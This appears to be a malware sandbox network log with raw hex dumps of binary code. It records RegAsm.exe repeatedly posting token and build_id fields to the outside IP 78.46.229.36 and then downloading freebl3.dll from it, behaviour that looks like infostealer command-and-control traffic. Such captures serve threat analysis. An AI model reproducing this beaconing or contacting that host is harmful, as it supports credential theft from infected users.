2024-03-28 19:34:59 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-03-28 19:34:59 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-03-28 19:34:59 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-03-28 19:34:59 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-03-28 19:34:59 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-03-28 19:34:59 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49715	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:00 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:00 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------GIEBAECAKKFCBFIEGCBKCont
2024-03-28 19:35:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49716	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:01 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:01 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------KECFIDGCBFBAKEBFBKFBCont
2024-03-28 19:35:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49717	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:02 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:02 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------EHCFBFBAEBKJKEBGCAEHCont
2024-03-28 19:35:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49718	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:03 UTC	205	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 19:35:04 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:04 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-03-28 19:35:04 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-03-28 19:35:04 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 